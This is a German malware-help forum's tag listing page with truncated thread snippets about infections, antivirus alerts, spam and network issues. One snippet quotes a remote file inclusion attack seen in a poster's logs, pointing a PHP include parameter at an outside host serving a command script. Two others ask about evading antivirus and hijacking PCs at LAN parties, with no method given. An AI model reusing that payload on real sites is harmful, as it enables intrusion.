Zurück   Trojaner-Board > Themen

Alles zum Thema: Teufel

  Letzter Beitrag Antworten Hits Forum
Mein Internet Explorer öffnet Sich Ständig
Teufel - Hallo, mein Internet Explorer öffnet sich ständig von selbst und schließt sich anschließend gleich wieder. Was kann ich dagegen machen? Mit dem Programm Hijackthis hab ich null plan!!! :schmoll: Look 2me hab ich schon ausprobiert hat aber nichts gefunden. Vielen Dank im Voraus ;)
Log-Analyse und Auswertung
spylocked 3.6 bekämpfen wie?
Teufel - hi, ich hätte mal ne frage also ich wollt mir ein video im internet anschauen das nicht ging,darauf hab ich mir das angebliche programm runtergeladen das mir hilft es sehen zu können. Dieses programm war leider der virus:spylocked 3.6 nur ich hab leider nicht viel ahnung von virus bekämpfung...
Plagegeister aller Art und deren Bekämpfung
Software auf Heft-CDs/DVDs von Zeitschriften
Teufel - Man bekommt immer wieder mitsamt allerhand Computerheftln CD- und DVD-weise Software. Das kann Bekanntes und Nützliches wie eine komplette Linux-Distri, bewährte oft freie Software und Tools für Windows sein, oft aber auch nicht sehr bekannte Free-/Shareware mit vielversprechenden Features oder wie...
Diskussionsforum
IcQ 6
Teufel - Hi Leute ich habe mal neh frage ich habe mia gerade das neue icq 6 runtergeladen und es ist nur englisch :teufel3: :teufel2: kann mia einer die datei geben das es deutsch is oder die seite wo man es runterladen kann? Danke To.OpI
Mülltonne
Was/Wer zum Teufel ist: "scvhost.ex"????
Teufel - Hallo, ich habe heute auf einmal beim start meines pc's fehlermeldungen auf den desktop bekommen, in denen steht, dass die scvhost.exe nicht gefunden werden konnte.... Mhm, danach wollte ich den befehl "regedit" unter start---->ausführen eingeben, aber windows sagt mir dann immer: "Das...
Plagegeister aller Art und deren Bekämpfung
Die Reduktion der Spammails im Internet
Teufel - Liebes Board Wie glaubt ihr kan man das immer größere Problem mit Spam :teufel3: im Internet reduzieren. Das man selber nicht auf jeder X-beliebigen Seite seine Emailadresse hinterlässt ist für mich mal klar. Ich finde eine Möglichkeit wäre eventuel bei Emailadressen Anbieter die keine...
Diskussionsforum
Problem mit drwatson
Teufel - Hallo. Habe ein Riesenproblem mit drwatson :teufel1: Jedesmal wenn ich eine Ordner öffne zeigt mir mein Mauszeiger kurz eine Hintergrundaktivität an und der Ordner hängt sich auf. Wenn ich dann den Prozessmanager öffne und mir die aktiven Prozesse ansehe steht dadrwatson mit drin. Beende...
Plagegeister aller Art und deren Bekämpfung
Frage über Spionage Möglichkeit
Teufel - Hy,also ich brauch mal ganz dirgend hilfe...... bzw..Infos... Also ein "Kumpel" von mir,der sich in Hacker Kreisen aufhält,hat mir erzählt,dass er die Möglichkeit hat,die er auch in die Tat setzt,dass er jeder Zeit genau sehen kann,wann einer seiner Freunde bzw. Feinde Online kommt.- Hierfür...
Plagegeister aller Art und deren Bekämpfung
Hilfe! Unbekanntes Textdokument auf meinem Rechner gefunden!
Teufel - Guten Tag! Erst kürzlich habe ich einen Thread gepostet, weil ich mir den Win Antivir 2006 Trojaner eingefangen habe. Nun habe ich beim Hausaufgaben machen einen Ordner gefunden, den ich nie und nimmer dort angelegt habe. Er heißt "54008949bab6d66fd58c47ea84" und darin findet sich ein...
Plagegeister aller Art und deren Bekämpfung
Euer wissen ist gefragt !
Teufel - Hallo Leute , ich gehe öfters auf LAN-Partys und da gibt es so einen Kerl der unsere Computer immer hacken kann und sie somit kontrolliert , das nervt mit der Zeit :koch: . Deswegen wollte ih euch Fragen ob ihr auch eine Methode kennt wie man einen Computer bei einer Lan-Party steuern kann...
Mülltonne
antivirenprogramm überlisten
Teufel - Hallo, ich weiß jetzt nicht ob ich hier richtig gepostet habe also folgenes: Wenn ich es geschafft habe einen Trojaner auf den PC meines Bruders (der in einer anderen Stadt wohnt und ich das desswegen nicht direkt an deinem PC machen kann) zu bringen springt natürlich sein scanner an. Kann ich...
Antiviren-, Firewall- und andere Schutzprogramme
Falscher weiterleitung bei google
Teufel - Hallo Expertenm, ich benötige eure Hilfe!! Ich bin mit dem Computer auf Kriegsfuß:teufel2: Seit einigen Tagen habe ich ein Problem mit der Seite von Google. Wenn ich einen Begriff zur Suche eingeben und auf den Link klicke dann werde ich auf einen anderen File verlinkt und bekomme nicht die...
Antiviren-, Firewall- und andere Schutzprogramme
Backdoor.Cakl A-D
Teufel - Spyware Doctor gehört zu den ganz wenigen Namen, denen Sie voll und ganz vertrauen können Hatte Sie selbst alle auf meinem PC - jetzt alle :snyper: Weder Bitfinder noch Kaspersky konnte sie löschen !!! Montana :teufel2:
Antiviren-, Firewall- und andere Schutzprogramme
CD Laufwerk öffnet sich von selber
Teufel - Hallo Forum, ich habe seit kurzem das Problem, dass sich auf meinem W98 Rechner mein CD Laufwerk von selber öffnet und schließt. Nun weiß ich nicht ob es sich hiebei um einen technischen deffekt handelt oder ob ich mir einen Troyaner eingefangen habe. Dummerweise habe ich weder ein...
Plagegeister aller Art und deren Bekämpfung
M$-Überwachung
Teufel - http://www.pctipp.ch/webnews/wn/33447.asp Ist damit doch endlich bewiesen, dass der pöhse Billy uns alle ausspioniert? Oder doch nur die Raubkopierer? :teufel2:
Überwachung, Datenschutz und Spam
Internet-Verbindungsproblem über Lan
Teufel - Hey Leute... Ich hab auch mal wieder ein Prob. :lach: Also... Ich will mich mit meinem labtop, was mit einem lan-kabel in ein modem (Fritz!Box Sl) geht, über Aol ins internet einwählen aber es schlägt bei dem Schritt : "Das Netzwerk antwortet" fehl ... Dann versucht Aol sich noch mal...
Netzwerk und Hardware
hilfe Trojaner TR/Zlob.k.2
Teufel - Hallo Zusammen Ich habe ein riessen problem!Mein Virenscanner (antivir pe classic) erkennt einen trojaner den TR/Zlob.k.2, kann ihn auch löschen, aber er kommt immer wieder!Habe überall nach einer lösung gesucht, aber nichts gefunden!Bei google kommt nur 1 eintrag über ihn und der ist nichts!...
Plagegeister aller Art und deren Bekämpfung
Werde bald verrückt !!!! Brauche echte Hilfe !!!
Teufel - Hallo Forum ! Habe folgendendes Problem. Auf dem Rechner meines Kollegen ist der Teufel los. Wenn er den Internet explorer oder den mozzila öffnet und damit rumsurft, gehen laufend neue Browser fenster und es kommen websites wie zb: - http://www.pr-omoting.com/tau.html -...
Plagegeister aller Art und deren Bekämpfung
hiii
Teufel - lol hi bin neu hier:zzwhip: :teufel1: :snyper: :snyper: :snyper:
Plagegeister aller Art und deren Bekämpfung
Papageno
Teufel - :teufel2: hallo zusammen, brauche euere hilfe !!! jedesmal beim aufstarten von win-xp kommt ein bild mit dem namen auf dem bild "Papageno" das auch wiede schnell verschwindet ??? was ist das? und wie bekomme ich das bild wieder weg??? Danke und gruss aus basel para
Plagegeister aller Art und deren Bekämpfung
Kann man Windows nur wenige Male aktivieren???
Teufel - Hey hab mal ne wichtige Frage: letztens habe ich irgendwo gelesen, dass man WIndows nur wenige Male aktivieren kann und dass danach dann die Version abgelaufen ist und man sich eine neue zulegen muss..stimmt dass?????:teufel1: :teufel1: MFG Manni
Alles rund um Windows
Hab mal ein Frage wegen Trojana gif bzw. hackversuch
Teufel - Also bei mir auf der Webseite hat heute einer öfters versucht eine fremde Domain zu includen. Das Was er versucht hat sieht so aus h**p://meineDomain.de/include.php?file= und hat das dann angehängt h**p://br.geocities.lasichweg/cmdsharkhackers/cmd.gif?&cmd=ls hab mir dann mal die Seite angeschaut...
Plagegeister aller Art und deren Bekämpfung
adobe gamma loader bereitet AntiVir probleme
Teufel - adobe gamma loader bereitet AntiVir probleme hallo, benutze antiVir personaledition ver.6.32.00.51 unter win xp sp2 und habe das problem,dass das programm zu ADOBE GAMMA LOADER.EXE meint, es sei ein trojaner namens Click.VB.LA !? habe mit google rausgefunden,dass es ein an sich...
Plagegeister aller Art und deren Bekämpfung
BDS/Falastit
Teufel - Hallo, Antivir bringt mir die Meldung, dass ich mir das Backdoorprogramm BDS/Falastit eingefangen habe. Was kann ich dagegen tun ohne eine Neuinstallation durchzuführen? Im Netz ist nichts dazu zu finden. Wer kann mir helfen. Bis dann Der Wolf :teufel1:
Plagegeister aller Art und deren Bekämpfung
Hilfe Trojaner!
Teufel - Hilfe! Ich habe unter "C:\Dokumente und Einstellungen\Name" eine unsichtbare Datei, die etliche Mengen:teufel1: an Trojaner des Typs "W32/Sdbot.dr.gen trojan" enthält (nach AntiVir). Doch ich kann die Datei nicht öffnen oder sonstwie lokalisieren.. Wie kann ich auf diese Datei zugreifen und...
Plagegeister aller Art und deren Bekämpfung
Archiv
Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.